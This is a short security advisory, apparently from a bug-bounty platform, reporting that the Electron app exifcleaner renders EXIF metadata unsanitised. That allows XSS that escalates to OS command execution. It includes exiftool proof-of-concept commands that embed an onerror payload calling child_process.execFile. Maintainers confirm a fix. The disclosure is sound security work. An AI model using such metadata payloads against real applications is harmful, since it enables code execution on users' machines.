OS Command Injection in sztheory/exifcleaner


Reported on

May 3rd 2021

✍️ Description

Command Injection using XSS via EXIF Data.

The application displays the image metadata in HTML format without removing malicious tags, therefore an XSS attack can be performed.

exiftool -Comment='</strong><img src=x onerror=alert(1) /><b>OverJT</b>' MY_IMAGE.png

Being an application made in electron, it allows to easily scale the XSS to a OS code execution attack through the child-process module.

🕵️‍♂️ Proof of Concept

exiftool -Comment='</strong><img src=x onerror=window.require("child_process").execFile("/usr/bin/firefox") /><b>OverJT</b>' MY_IMAGE.png

💥 Impact

An attacker can create an image with malicious metadata to run a reverse shell

Jonathan Toledo
3 years ago


Fixed by the exifcleaner team

Jamie Slome
3 years ago


I have tracked the patch commit SHA against this advisory.

All green now, thanks for the heads up @Jonathan.

to join this conversation